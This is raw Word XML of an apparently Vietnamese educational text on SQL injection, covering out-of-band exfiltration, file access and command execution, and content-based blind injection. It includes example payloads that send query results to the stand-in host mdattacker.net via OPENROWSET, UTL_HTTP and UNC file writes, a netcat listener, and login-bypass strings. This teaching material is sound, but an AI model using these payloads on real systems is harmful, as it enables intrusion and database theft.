    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Phân tích ví dụ chức năng đăng nhập, có thể inject vào một vị trí bất kỳ trong câu lệnh kiểm tra. Tuy nhiên lại không thể nhận được kết quả của câu truy vấn đó.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marcus’ and password = ‘secret’</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Ngoài việc thay đổi logic của ứng dụng để vượt qua chức năng đăng nhập ở trên, </w:t>
      </w:r>
      <w:r w:rsidR="001A4F73">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>kẻ tấn công</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> có thể chèn một câu truy vấn con (sub-query) riêng biệt để tạo ra dữ liệu mà có thể kiểm soát. Ví dụ nếu trường username truyền vào: foo’ || (SELECT 1 FROM dual WHERE (SELECT username FROM all_users WHERE username = ‘DBSNMP’) = ‘DBSNMP’) -- thì câu truy vấn sẽ trở thàn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foo’ || (SELECT 1 FROM dual WHERE (SELECT username FROM all_users WHERE username = ‘DBSNMP’) = ‘DBSNMP’)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Câu lệnh truy vấn sẽ thực thi câu truy vấn bên trong. Tất nhiên việc đăng nhập sẽ thất bại, tuy nhiên câu lệnh con bên trong sẽ được thực thi. Việc tiếp theo cần phải lấy được kết quả của câu truy vấn con này. Khi đó, cần một kênh truyền dạng khác để lấy được kết quả. Thông thường sẽ sử dụng các chức năng mà DBMS hỗ trợ để tạo ra một kết nối ngược lại máy tính của người dùng – cũng là kẻ tấn công. Qua đó, kết quả được truyền đến máy tính của kẻ tấn công. Việc tạo ra các kết nối này phụ thuộc vào loại DBMS mà ứng dụng sử dụng, các phương pháp này có thể khác nhau, hoặc đòi hỏi đặc quyền cụ thể. Một số kỹ thuật phổ biến như:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>MS-SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>: Trên các phiên bản MSSQL 2000 trở về trước, lệnh OpenRowSet cho phép mở kết nối đến một CSDL khác và thực hiện insert dữ liệu vào. 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insert into openrowset(‘SQLOLEDB’,</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="005D3C52">
              <w:t>‘DRIVER={SQL Server};SERVER=mdattacker.net,80;UID=sa;PWD=letmein’,</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="005D3C52">
              <w:t>‘select * from foo’) values (@@version)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Oracle:</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> DBMS này có rất nhiều hàm, chức năng cho phép tạo một kênh out-of-band tới một máy chủ khác. UTL_HTTP package có thể sử dụng để tạo ra các yêu cầu dạng HTTP như ví dụ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lastRenderedPageBreak/>
              <w:t>/employees.asp?EmpNo=7521’||UTL_HTTP.request(‘mdattacker.net:80/’||</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="005D3C52">
              <w:t>(SELECT%20username%20FROM%20all_users%20WHERE%20ROWNUM%3d1))--</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>URL trên tạo ra một UTL_HTTP, gửi một URL chứa username đầu tiên trong bảng all_users. Kẻ tấn công đơn giản sử dụng netcat trên máy chủ mdattacker.net để nhận kết quả:</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C:\&gt;nc -nLp 80</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="005D3C52">
              <w:t>GET /SYS HTTP/1.1</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="005D3C52">
              <w:t>Host: mdattacker.net</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="005D3C52">
              <w:t>Connection: close</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>: Sử dụng lệnh SELECT ... INTO OUTFILE để ghi trực tiếp kết quả của câu truy vấn vào file, trong đó các tệp tin có thể sử dụng đường dẫn dạng UNC để ghi vào máy chủ của kẻ tấn công. Ví dụ:</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into outfile ‘\\\\mdattacker.net\\share\\output.txt’ from users;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Để nhận dữ liệu, kẻ tấn công tạo một SMB server có quyền ghi cho tài khoản anonymous.</w:t>
      </w:r>
      <w:r w:rsidR="003633C3">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rP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rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="00945280">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="_Toc459822495"/>
      <w:r w:rsidRPr="005D3C52">
        <w:t>Các kỹ thuật tấn công nâng cao</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Trong một số trường hợp, dữ liệu không phải là mục tiêu chính của hacker. Mục tiêu đó có thể là </w:t>
      </w:r>
      <w:r w:rsidR="00F86F13">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>hính máy chủ, để hacker có thể lợi dụng thực hiện các âm mưu tấn công khác. Các kỹ thuật tấn công nâng cao này có thể kể đến như:</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 xml:space="preserve"> Đọc/ghi các file trên máy chủ.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="993"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Thực thi câu lệnh hệ điều hành.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Trong ví dụ trên đã thấy MySQL có tập lệnh hỗ trợ việc ghi file. Đây là một trong những yếu tố tạo điều kiện cho việc tấn công nâng quyền, chiếm quyền điều khiển máy chủ. MySQL cũng cung cấp lệnh LOAD DATA INFILE và  LOAD_FILE để đọc file trên máy chủ.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F69FA" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="004F69FA">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="27E5AF23" wp14:editId="317C8B30">
            <wp:extent cx="4394835" cy="36366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8"/>
                    <a:srcRect t="3344" b="7032"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4394835" cy="363664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32" w:name="_Toc459819436"/>
      <w:r w:rsidRPr="005D3C52">
        <w:t xml:space="preserve">Hình </w:t>
      </w:r>
      <w:fldSimple w:instr=" STYLEREF 1 \s ">
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>1</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidR="000512EB">
        <w:t>.</w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Hình \* ARABIC \s 1 ">
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>9</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidRPr="005D3C52">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="003F7098" w:rsidRPr="005D3C52">
        <w:t>Đọc file /etc/passwd trên máy chủ.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Đối với MSSQL Server có thể sử dụng scripting.filesystem để đọc/ghi file trên máy chủ. Trong khi Oracle lại hỗ trợ rất nhiều cách để đọc ghi file như UTL_FILE, DBMS_ADVISOR, DBMS_XSLPROCESSOR, DBMS_XMLDOM, External tables, Java. Ngoài ra, còn một cách nữa là sử dụng câu lệnh hệ điều hành. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Đối với MySQL, mặc định không hỗ trợ tính năng thực thi câu lệnh hệ điều hành. Để sử dụng tính năng này cần sử dụng một bộ thư viện ngoài (UDF). Kẻ tấn công thường sử dụng DUMP File để ghi tập tin udf lên máy chủ, sau đó nạp file thư viện vào mysql để thực thi câu lệnh hệ điều hành. Đối với MSSQL Server hỗ trợ xp_cmdshell để thực thi điều này, cũng có rất nhiều tài liệu mô tả chi tiết thực hiện. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rP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rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="_Toc459822496"/>
      <w:r w:rsidRPr="005D3C52">
        <w:lastRenderedPageBreak/>
        <w:t>Tấn công Blind SQL injection</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Có nhiều lý do làm cho tấn công dạng out-of-band không phổ biến. Một trong những lý do là các máy chủ CSDL thường nằm trong phân vùng mạng được bảo vệ, có sử dụng các tường lửa để chặn các kết nối chiều ra (outbound connection). Trong những trường hợp này, khả năng tương tác với CSDL thông qua lỗ hổng SQL injection bị hạn chế. Trong những trường hợp này, cần phải làm thế nào đó để nhận được dữ liệu trả về. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Tuy nhiên lưu ý là dữ liệu trả về không nằm trong reponse cho trình duyệt, hay thực hiện các kênh out-of-band để gửi trả dữ liệu. Lúc này, kẻ tấn công được ví như một người mù (blind) tìm cách để đoán một thứ đồ không thể nhìn thấy được. Tương tự trong tình huống này, vẫn có những kỹ thuật cho phép nhận được dữ liệu trả về, thông qua việc inject các câu lệnh điều kiện, sẽ được kích hoạt tùy thuộc vào nội dung CSDL, và các phương pháp phân tích để nhận được nội dung trả về này. Tùy thuộc vào kiểu hình thái mà </w:t>
      </w:r>
      <w:r w:rsidR="001A4F73">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>kẻ tấn công</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> buộc ứng dụng phải trả về, tấn công Blind SQL injection được chia làm 02 kỹ thuật chính: Content-Based và Time-Based.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="34" w:name="_Toc458409275"/>
      <w:bookmarkStart w:id="35" w:name="_Toc458409345"/>
      <w:bookmarkStart w:id="36" w:name="_Toc458433471"/>
      <w:bookmarkStart w:id="37" w:name="_Toc459373888"/>
      <w:bookmarkStart w:id="38" w:name="_Toc459373948"/>
      <w:bookmarkStart w:id="39" w:name="_Toc459374321"/>
      <w:bookmarkStart w:id="40" w:name="_Toc459822497"/>
      <w:bookmarkEnd w:id="34"/>
      <w:bookmarkEnd w:id="35"/>
      <w:bookmarkEnd w:id="36"/>
      <w:bookmarkEnd w:id="37"/>
      <w:bookmarkEnd w:id="38"/>
      <w:bookmarkEnd w:id="39"/>
      <w:r w:rsidRPr="005D3C52">
        <w:t>Tấn công Blind SQL injection dạng Content-Based</w:t>
      </w:r>
      <w:bookmarkEnd w:id="40"/>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Một cấu trúc điều kiện khác thường được sử dụng với DBMS MSSQL Server. Cùng phân tích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2B(case+when+(system_user+=+‘sa’)+then+1+else+0+end)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Có một sự khác biệt là ký tự “+” đã được URL encode chuyển thành %2B trong URL. Giá trị mà id parameter được nhận sẽ là: id = 12 + (case when (system_user = ‘sa’) then 1 else 0 end). Đây là một cấu trúc khá đơn giản, nếu như system_user là không phải là sa, thì URL tương đương với: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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Trường hợp khác, nếu system_user, id=13 và sẽ trả về tương đương v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lastRenderedPageBreak/>
              <w:t>http://www.victim.com/products.asp?id=13</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Hai id khác nhau sẽ trả về hai loại mặt hàng khác nhau, đương nhiên, nội dung sẽ khác nhau. URL đầu tiên có thể là một cuốn sách, URL thứ hai có thể là một cái lò vi sóng. Tùy thuộc vào nội dung trả về, </w:t>
      </w:r>
      <w:r w:rsidR="001A4F73">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>kẻ tấn công</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> hoàn toàn biết được, người dùng có phải tài khoản sa hay không.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Quay lại ví dụ về chức năng đăng nhập mắc lỗi, trường username và password được truyền vào câu truy vấn:</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marcus’ and password = ‘secret’</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Giả sử không xác định được phương pháp để truyền kết quả của câu truy vấn về trình duyệt. Tuy nhiên có thể thay đổi cấu trúc câu lệnh truy vấn để thay đổi những biểu hiện của ứng dụng. Ví dụ, khi gửi lên 2 mã tấn công sẽ trả về 2 kết quả khác nhau:</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admin’ AND 1=1--</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="005D3C52">
              <w:t>admin’ AND 1=2--</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Trong trường hợp thứ nhất, ứng dụng sẽ cho đăng nhập với tài khoản admin. Trong trường hợp thứ hai, sẽ đăng nhập không thành công, vì điều kiện 1=2 luôn trả về false. Có thể tận dụng điều này để điều khiển các trạng thái của ứng dụng, suy luận dựa trên trường hợp đúng, trường hợp sai của câu lệnh để khai thác dữ liệu trong cơ sở dữ liệu. Ví dụ như sử dụng hàm ASCII và SUBSTRING có thể xác một ký tự cụ thể, ở vị trí cụ thể, có một giá trị cụ thể. Trong ví dụ sau, nếu gửi lên chuỗi: admin’ AND ASCII(SUBSTRING(‘Admin’,1,1)) = 65-- thì sẽ đăng nhập thành công với tài khoản admin, bởi vì điều kiện trả về luôn đúng. (Câu điều kiện lấy ký tự đầu tiên trong chuỗi Admin là A, rồi chuyển sang bảng mã ASCII tương ứng mã 65. 65 = 65 sẽ trả về True).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Nếu như gửi lên chuỗi sau sẽ trả về là Fail, đăng nhập không thành công: admin’ AND ASCII(SUBSTRING(‘Admin’,1,1)) = 66-- . Bằng việc gửi lên một loạt các dữ liệu, hết một vòng bảng mã ASCII, hoặc cho đến khi nào kết quả </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>True được trả về sẽ xác định được chuỗi ký tự. Như vậy, bằng cách phân tích nội dung trả về (Content) của dữ liệ</w:t>
      </w:r>
      <w:r w:rsidR="001A4F73">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>u, kẻ tấn công</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> đã xác định được được tính Đúng/Sai của câu truy vấn, từ đó xác định được ký tự.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="41" w:name="_Toc459822498"/>
      <w:r w:rsidRPr="005D3C52">
        <w:t>Tấn công Blind SQL injection dạng Time-Based</w:t>
      </w:r>
      <w:bookmarkEnd w:id="41"/>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Trong tấn công dạng Content-base ở trên, dữ liệu trả vẫn có liên quan nhiều đến câu truy vấn, kết quả vẫn trả về trong nội dung HTML của trình duyệt (dù không thật sự tường minh). Trong một số trường hợp, </w:t>
      </w:r>
      <w:r w:rsidR="001A4F73">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>kẻ tấn công</w:t>
      </w:r>
